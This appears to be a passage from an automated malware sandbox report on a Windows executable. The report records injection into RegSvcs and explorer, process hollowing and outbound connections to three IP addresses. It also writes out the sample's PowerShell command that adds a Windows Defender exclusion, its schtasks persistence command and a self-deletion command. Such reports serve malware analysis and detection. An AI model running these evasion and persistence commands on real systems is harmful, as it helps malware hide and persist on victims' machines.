Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0167CA11 mov eax, dword ptr fs:[00000030h]	6_2_0167CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162AAEE mov eax, dword ptr fs:[00000030h]	6_2_0162AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0162AAEE mov eax, dword ptr fs:[00000030h]	6_2_0162AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F0AD0 mov eax, dword ptr fs:[00000030h]	6_2_015F0AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01646ACC mov eax, dword ptr fs:[00000030h]	6_2_01646ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01646ACC mov eax, dword ptr fs:[00000030h]	6_2_01646ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01646ACC mov eax, dword ptr fs:[00000030h]	6_2_01646ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01624AD0 mov eax, dword ptr fs:[00000030h]	6_2_01624AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01624AD0 mov eax, dword ptr fs:[00000030h]	6_2_01624AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_01646AA4 mov eax, dword ptr fs:[00000030h]	6_2_01646AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FEA80 mov eax, dword ptr fs:[00000030h]	6_2_015FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FEA80 mov eax, dword ptr fs:[00000030h]	6_2_015FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FEA80 mov eax, dword ptr fs:[00000030h]	6_2_015FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015FEA80 mov eax, dword ptr fs:[00000030h]	6_2_015FEA80

Source: C:\Users\user\Desktop\22#U0415.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.80.45.39 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\22#U0415.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\22#U0415.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 2580	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 2580	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 2580	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\systray.exe base address: B30000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: F80000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\22#U0415.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C61008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C71008	Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp8942.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000002.2873612145.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1652346622.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1652346622.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2870982686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1651619225.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2870031242.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000007.00000000.1652346622.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2870982686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.1652346622.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2870982686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Users\user\Desktop\22#U0415.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
